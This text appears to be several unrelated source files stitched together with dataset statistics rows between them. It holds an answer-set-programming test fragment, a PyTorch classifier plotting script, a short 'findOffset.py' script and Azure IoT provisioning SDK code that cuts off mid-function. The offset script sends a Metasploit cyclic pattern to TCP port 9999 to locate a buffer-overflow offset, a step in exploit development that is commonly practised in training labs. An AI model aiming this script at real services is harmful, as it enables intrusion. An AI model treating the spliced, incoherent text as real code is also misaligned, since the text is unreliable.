:- r(M, N), M < #min{V : a(V), b, c} < N.
:- M < #min{V : a(V), b, c} < N, r(M, N).
%:- r(M, N), M < #min{V : a(V), b, c} < N.
%:- M < #min{V : a(V), b, c} < N, r(M, N).
%---- var < #min{...} <= var ----
okay23(M, N) :- q(M, N), M < #min{V : a(V), b, c} <= N.
okay24(M, N) :- M < #min{V : a(V), b, c} <= N, q(M, N).
:- s(M, N), M < #min{V : a(V), b, c} <= N.
:- M < #min{V : a(V), b, c} <= N, s(M, N).
%:- s(M, N), M < #min{V : a(V), b, c} <= N.
%:- M < #min{V : a(V), b, c} <= N, s(M, N).
%---- var <= #min{...} < var ----
okay25(M, N) :- p(M, N), M <= #min{V : a(V), b, c} < N.
okay26(M, N) :- M <= #min{V : a(V), b, c} < N, p(M, N).
:- r(M, N), M <= #min{V : a(V), b, c} < N.
:- M <= #min{V : a(V), b, c} < N, r(M, N).
%:- r(M, N), M <= #min{V : a(V), b, c} < N.
%:- M <= #min{V : a(V), b, c} < N, r(M, N).
%---- var <= #min{...} <= var ----
okay27(M, N) :- s(M, N), M <= #min{V : a(V), b, c} <= N.
okay28(M, N) :- M <= #min{V : a(V), b, c} <= N, s(M, N).
:- t(M, N), M <= #min{V : a(V), b, c} <= N.
% The following constraint is always violated.
:- M <= #min{V : a(V), b, c} <= N, p(M, N).
%:- t(M, N), M <= #min{V : a(V), b, c} <= N.
%:- M <= #min{V : a(V), b, c} <= N, t(M, N).
"""
| 24.870968 | 82 | 0.311184 | 2,088 | 10,023 | 1.493774 | 0.035441 | 0.143636 | 0.269317 | 0.323181 | 0.996473 | 0.996473 | 0.996473 | 0.996473 | 0.996473 | 0.996473 | 0 | 0.01921 | 0.345605 | 10,023 | 402 | 83 | 24.932836 | 0.45632 | 0 | 0 | 0.990826 | 0 | 0.770642 | 0.996907 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 13 |
1e84bfd72f88100735a19ef4c130c55369c93238 | 3,440 | py | Python | slides/03_machine_learning_models/neural_nets.py | data-psl/lectures2020 | 5239d4912eb087dcc0b5351df11bbfb0f74f4bc3 | [
"MIT"
] | 40 | 2020-08-26T07:52:34.000Z | 2022-03-27T18:56:08.000Z | slides/03_machine_learning_models/neural_nets.py | pierreablin/pierreablin.github.io | e10d8af9ba916ca5ade68f4fffe35b00d00c7e89 | [
"MIT"
] | null | null | null | slides/03_machine_learning_models/neural_nets.py | pierreablin/pierreablin.github.io | e10d8af9ba916ca5ade68f4fffe35b00d00c7e89 | [
"MIT"
] | 17 | 2020-08-30T02:21:33.000Z | 2021-09-30T02:08:01.000Z | import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
from torch.nn import Sequential
import matplotlib.pyplot as plt
n_hidden = 4
nn1 = Sequential(nn.Linear(2, n_hidden), nn.Tanh(), nn.Linear(n_hidden, 2))
nn2 = Sequential(nn.Linear(2, n_hidden), nn.Tanh(),
nn.Linear(n_hidden, n_hidden), nn.Tanh(),
nn.Linear(n_hidden, 2))
n = 1000
n_points = 10
t = np.linspace(0, 2 * np.pi, n_points, endpoint=False)
c = np.array([(np.cos(t_), np.sin(t_)) for t_ in t])
y = np.arange(n_points) % 2
X = np.concatenate([0.1 * np.random.randn(n, 2) + c_ for c_ in c])
y = np.concatenate([y_ * np.ones(n) for y_ in y])
X = torch.tensor(X).float()
y = torch.tensor(y).long()
f, ax = plt.subplots(figsize=(3.5, 3.5))
xm, xM = -1.5, 1.5
ax.set_xlim(xm, xM)
ax.set_ylim(xm, xM)
s = 3
for i, name in enumerate(['class 1', 'class 2']):
loc = np.where(y == i)[0]
plt.scatter(X[loc, 0], X[loc, 1], s=s, label=name)
plt.legend()
ax.set_xticks([])
ax.set_yticks([])
plt.savefig('images/nn.png', dpi=200)
for n_hidden in [2, 3, 4, 5, 6]:
nn1 = Sequential(nn.Linear(2, n_hidden), nn.Tanh(),
nn.Linear(n_hidden, 2 * n_hidden), nn.Tanh(),
nn.Linear(2 * n_hidden, 2))
optimizer = optim.Adam(nn1.parameters(), lr=1e-2)
criterion = nn.CrossEntropyLoss()
for i in range(1001):
optimizer.zero_grad()
pred = nn1(X)
loss = criterion(pred, y)
loss.backward()
optimizer.step()
if i % 100 == 0:
print(loss.item())
f, ax = plt.subplots(figsize=(3.5, 3.5))
xm, xM = -1.5, 1.5
ax.set_xlim(xm, xM)
ax.set_ylim(xm, xM)
s = 3
for i, name in enumerate(['class 1', 'class 2']):
loc = np.where(y == i)[0]
plt.scatter(X[loc, 0], X[loc, 1], s=s, label=name)
plt.legend()
ax.set_xticks([])
ax.set_yticks([])
xx, yy = np.meshgrid(np.linspace(-1.5, 1.5),
np.linspace(-1.5, 1.5))
data = torch.tensor(np.c_[xx.ravel(), yy.ravel()]).float()
op = nn1(data).detach()
z = op.numpy().argmax(axis=1)
Z = z.reshape(xx.shape)
plt.contourf(xx, yy, Z, levels=1, alpha=0.5, colors=['b', 'orange'])
plt.savefig('images/nn_two_%s.png' % n_hidden, dpi=200)
for n_hidden in [2, 3, 4, 5, 6]:
nn1 = Sequential(nn.Linear(2, n_hidden), nn.Tanh(), nn.Linear(n_hidden, 2))
optimizer = optim.Adam(nn1.parameters(), lr=1e-2)
criterion = nn.CrossEntropyLoss()
for i in range(1001):
optimizer.zero_grad()
pred = nn1(X)
loss = criterion(pred, y)
loss.backward()
optimizer.step()
if i % 100 == 0:
print(loss.item())
f, ax = plt.subplots(figsize=(3.5, 3.5))
xm, xM = -1.5, 1.5
ax.set_xlim(xm, xM)
ax.set_ylim(xm, xM)
s = 3
for i, name in enumerate(['class 1', 'class 2']):
loc = np.where(y == i)[0]
plt.scatter(X[loc, 0], X[loc, 1], s=s, label=name)
plt.legend()
ax.set_xticks([])
ax.set_yticks([])
xx, yy = np.meshgrid(np.linspace(-1.5, 1.5),
np.linspace(-1.5, 1.5))
data = torch.tensor(np.c_[xx.ravel(), yy.ravel()]).float()
op = nn1(data).detach()
z = op.numpy().argmax(axis=1)
Z = z.reshape(xx.shape)
plt.contourf(xx, yy, Z, levels=1, alpha=0.5, colors=['b', 'orange'])
plt.savefig('images/nn_one_%s.png' % n_hidden, dpi=200)
| 29.655172 | 79 | 0.56657 | 589 | 3,440 | 3.229202 | 0.191851 | 0.062566 | 0.011041 | 0.014721 | 0.813354 | 0.812829 | 0.798107 | 0.787592 | 0.787592 | 0.787592 | 0 | 0.053016 | 0.243314 | 3,440 | 115 | 80 | 29.913043 | 0.67768 | 0 | 0 | 0.739583 | 0 | 0 | 0.031686 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.0625 | 0 | 0.0625 | 0.020833 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
1ed814d7747031aba2af51bf2a47802f56167df5 | 1,350 | py | Python | findOffset.py | ArchCWithClasses/VanillaX86BufferOverflow | d154ceae6237cec82df834b0eeba7400510e28f1 | [
"MIT"
] | null | null | null | findOffset.py | ArchCWithClasses/VanillaX86BufferOverflow | d154ceae6237cec82df834b0eeba7400510e28f1 | [
"MIT"
] | null | null | null | findOffset.py | ArchCWithClasses/VanillaX86BufferOverflow | d154ceae6237cec82df834b0eeba7400510e28f1 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import sys, socket
#/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1024
pattern = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0B"
try:
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("Machine IP", 9999))
s.send(pattern + "\r\n")
s.close()
except:
print "Error connecting to server"
sys.exit()
| 64.285714 | 1,036 | 0.925185 | 50 | 1,350 | 24.92 | 0.78 | 0.019262 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.268255 | 0.036296 | 1,350 | 20 | 1,037 | 67.5 | 0.68947 | 0.067407 | 0 | 0 | 0 | 0 | 0.84646 | 0.814638 | 0 | 1 | 0 | 0 | 0 | 0 | null | null | 0 | 0.1 | null | null | 0.1 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
949fd8e24bfe55dd9b779224c5dfc0f916401b55 | 44,199 | py | Python | azure-mgmt-iothubprovisioningservices/azure/mgmt/iothubprovisioningservices/operations/iot_dps_resource_operations.py | v-Ajnava/azure-sdk-for-python | a1f6f80eb5869c5b710e8bfb66146546697e2a6f | [
"MIT"
] | 4 | 2016-06-17T23:25:29.000Z | 2022-03-30T22:37:45.000Z | azure-mgmt-iothubprovisioningservices/azure/mgmt/iothubprovisioningservices/operations/iot_dps_resource_operations.py | v-Ajnava/azure-sdk-for-python | a1f6f80eb5869c5b710e8bfb66146546697e2a6f | [
"MIT"
] | 54 | 2016-03-25T17:25:01.000Z | 2018-10-22T17:27:54.000Z | azure-mgmt-iothubprovisioningservices/azure/mgmt/iothubprovisioningservices/operations/iot_dps_resource_operations.py | v-Ajnava/azure-sdk-for-python | a1f6f80eb5869c5b710e8bfb66146546697e2a6f | [
"MIT"
] | 3 | 2016-05-03T20:49:46.000Z | 2017-10-05T21:05:27.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
import uuid
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
from msrest.exceptions import DeserializationError
from msrestazure.azure_operation import AzureOperationPoller
from .. import models
class IotDpsResourceOperations(object):
"""IotDpsResourceOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An objec model deserializer.
:ivar api_version: The version of the API. Constant value: "2017-11-15".
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.api_version = "2017-11-15"
self.config = config
def get(
self, provisioning_service_name, resource_group_name, custom_headers=None, raw=False, **operation_config):
"""Get the non-security related metadata of the provisioning service.
Get the metadata of the provisioning service without SAS keys.
:param provisioning_service_name: Name of the provisioning service to
retrieve.
:type provisioning_service_name: str
:param resource_group_name: Resource group name.
:type resource_group_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: ProvisioningServiceDescription or ClientRawResponse if
raw=true
:rtype:
~azure.mgmt.iothubprovisioningservices.models.ProvisioningServiceDescription
or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorDetailsException<azure.mgmt.iothubprovisioningservices.models.ErrorDetailsException>`
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{provisioningServiceName}'
path_format_arguments = {
'provisioningServiceName': self._serialize.url("provisioning_service_name", provisioning_service_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorDetailsException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ProvisioningServiceDescription', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def _create_or_update_initial(
self, resource_group_name, provisioning_service_name, iot_dps_description, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{provisioningServiceName}'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'provisioningServiceName': self._serialize.url("provisioning_service_name", provisioning_service_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(iot_dps_description, 'ProvisioningServiceDescription')
# Construct and send request
request = self._client.put(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, stream=False, **operation_config)
if response.status_code not in [200, 201]:
raise models.ErrorDetailsException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ProvisioningServiceDescription', response)
if response.status_code == 201:
deserialized = self._deserialize('ProvisioningServiceDescription', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def create_or_update(
self, resource_group_name, provisioning_service_name, iot_dps_description, custom_headers=None, raw=False, **operation_config):
"""Create or update the metadata of the provisioning service.
Create or update the metadata of the provisioning service. The usual
pattern to modify a property is to retrieve the provisioning service
metadata and security metadata, and then combine them with the modified
values in a new body to update the provisioning service.
:param resource_group_name: Resource group identifier.
:type resource_group_name: str
:param provisioning_service_name: Name of provisioning service to
create or update.
:type provisioning_service_name: str
:param iot_dps_description: Description of the provisioning service to
create or update.
:type iot_dps_description:
~azure.mgmt.iothubprovisioningservices.models.ProvisioningServiceDescription
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:return: An instance of AzureOperationPoller that returns
ProvisioningServiceDescription or ClientRawResponse if raw=true
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.iothubprovisioningservices.models.ProvisioningServiceDescription]
or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorDetailsException<azure.mgmt.iothubprovisioningservices.models.ErrorDetailsException>`
"""
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
provisioning_service_name=provisioning_service_name,
iot_dps_description=iot_dps_description,
custom_headers=custom_headers,
raw=True,
**operation_config
)
if raw:
return raw_result
# Construct and send request
def long_running_send():
return raw_result.response
def get_long_running_status(status_link, headers=None):
request = self._client.get(status_link)
if headers:
request.headers.update(headers)
header_parameters = {}
header_parameters['x-ms-client-request-id'] = raw_result.response.request.headers['x-ms-client-request-id']
return self._client.send(
request, header_parameters, stream=False, **operation_config)
def get_long_running_output(response):
if response.status_code not in [200, 201]:
raise models.ErrorDetailsException(self._deserialize, response)
deserialized = self._deserialize('ProvisioningServiceDescription', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
long_running_operation_timeout = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
return AzureOperationPoller(
long_running_send, get_long_running_output,
get_long_running_status, long_running_operation_timeout)
def _update_initial(
self, resource_group_name, provisioning_service_name, tags=None, custom_headers=None, raw=False, **operation_config):
provisioning_service_tags = models.TagsResource(tags=tags)
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{provisioningServiceName}'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'provisioningServiceName': self._serialize.url("provisioning_service_name", provisioning_service_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(provisioning_service_tags, 'TagsResource')
# Construct and send request
request = self._client.patch(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ProvisioningServiceDescription', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def update(
self, resource_group_name, provisioning_service_name, tags=None, custom_headers=None, raw=False, **operation_config):
"""Update an existing provisioning service's tags.
Update an existing provisioning service's tags. to update other fields
use the CreateOrUpdate method.
:param resource_group_name: Resource group identifier.
:type resource_group_name: str
:param provisioning_service_name: Name of provisioning service to
create or update.
:type provisioning_service_name: str
:param tags: Resource tags
:type tags: dict[str, str]
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:return: An instance of AzureOperationPoller that returns
ProvisioningServiceDescription or ClientRawResponse if raw=true
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.iothubprovisioningservices.models.ProvisioningServiceDescription]
or ~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._update_initial(
resource_group_name=resource_group_name,
provisioning_service_name=provisioning_service_name,
tags=tags,
custom_headers=custom_headers,
raw=True,
**operation_config
)
if raw:
return raw_result
# Construct and send request
def long_running_send():
return raw_result.response
def get_long_running_status(status_link, headers=None):
request = self._client.get(status_link)
if headers:
request.headers.update(headers)
header_parameters = {}
header_parameters['x-ms-client-request-id'] = raw_result.response.request.headers['x-ms-client-request-id']
return self._client.send(
request, header_parameters, stream=False, **operation_config)
def get_long_running_output(response):
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = self._deserialize('ProvisioningServiceDescription', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
long_running_operation_timeout = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
return AzureOperationPoller(
long_running_send, get_long_running_output,
get_long_running_status, long_running_operation_timeout)
def _delete_initial(
self, provisioning_service_name, resource_group_name, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{provisioningServiceName}'
path_format_arguments = {
'provisioningServiceName': self._serialize.url("provisioning_service_name", provisioning_service_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200, 202, 204, 404]:
raise models.ErrorDetailsException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def delete(
self, provisioning_service_name, resource_group_name, custom_headers=None, raw=False, **operation_config):
"""Delete the Provisioning Service.
Deletes the Provisioning Service.
:param provisioning_service_name: Name of provisioning service to
delete.
:type provisioning_service_name: str
:param resource_group_name: Resource group identifier.
:type resource_group_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:return: An instance of AzureOperationPoller that returns None or
ClientRawResponse if raw=true
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorDetailsException<azure.mgmt.iothubprovisioningservices.models.ErrorDetailsException>`
"""
raw_result = self._delete_initial(
provisioning_service_name=provisioning_service_name,
resource_group_name=resource_group_name,
custom_headers=custom_headers,
raw=True,
**operation_config
)
if raw:
return raw_result
# Construct and send request
def long_running_send():
return raw_result.response
def get_long_running_status(status_link, headers=None):
request = self._client.get(status_link)
if headers:
request.headers.update(headers)
header_parameters = {}
header_parameters['x-ms-client-request-id'] = raw_result.response.request.headers['x-ms-client-request-id']
return self._client.send(
request, header_parameters, stream=False, **operation_config)
def get_long_running_output(response):
if response.status_code not in [200, 202, 204, 404]:
raise models.ErrorDetailsException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
long_running_operation_timeout = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
return AzureOperationPoller(
long_running_send, get_long_running_output,
get_long_running_status, long_running_operation_timeout)
def list_by_subscription(
self, custom_headers=None, raw=False, **operation_config):
"""Get all the provisioning services in a subscription.
List all the provisioning services for a given subscription id.
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of ProvisioningServiceDescription
:rtype:
~azure.mgmt.iothubprovisioningservices.models.ProvisioningServiceDescriptionPaged[~azure.mgmt.iothubprovisioningservices.models.ProvisioningServiceDescription]
:raises:
:class:`ErrorDetailsException<azure.mgmt.iothubprovisioningservices.models.ErrorDetailsException>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = '/subscriptions/{subscriptionId}/providers/Microsoft.Devices/provisioningServices'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(
request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorDetailsException(self._deserialize, response)
return response
# Deserialize response
deserialized = models.ProvisioningServiceDescriptionPaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.ProvisioningServiceDescriptionPaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
def list_by_resource_group(
self, resource_group_name, custom_headers=None, raw=False, **operation_config):
"""Get a list of all provisioning services in the given resource group.
:param resource_group_name: Resource group identifier.
:type resource_group_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of ProvisioningServiceDescription
:rtype:
~azure.mgmt.iothubprovisioningservices.models.ProvisioningServiceDescriptionPaged[~azure.mgmt.iothubprovisioningservices.models.ProvisioningServiceDescription]
:raises:
:class:`ErrorDetailsException<azure.mgmt.iothubprovisioningservices.models.ErrorDetailsException>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(
request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorDetailsException(self._deserialize, response)
return response
# Deserialize response
deserialized = models.ProvisioningServiceDescriptionPaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.ProvisioningServiceDescriptionPaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
def get_operation_result(
self, operation_id, resource_group_name, provisioning_service_name, asyncinfo="true", custom_headers=None, raw=False, **operation_config):
"""Gets the status of a long running operation, such as create, update or
delete a provisioning service.
:param operation_id: Operation id corresponding to long running
operation. Use this to poll for the status.
:type operation_id: str
:param resource_group_name: Resource group identifier.
:type resource_group_name: str
:param provisioning_service_name: Name of provisioning service that
the operation is running on.
:type provisioning_service_name: str
:param asyncinfo: Async header used to poll on the status of the
operation, obtained while creating the long running operation.
:type asyncinfo: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: AsyncOperationResult or ClientRawResponse if raw=true
:rtype:
~azure.mgmt.iothubprovisioningservices.models.AsyncOperationResult or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorDetailsException<azure.mgmt.iothubprovisioningservices.models.ErrorDetailsException>`
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{provisioningServiceName}/operationresults/{operationId}'
path_format_arguments = {
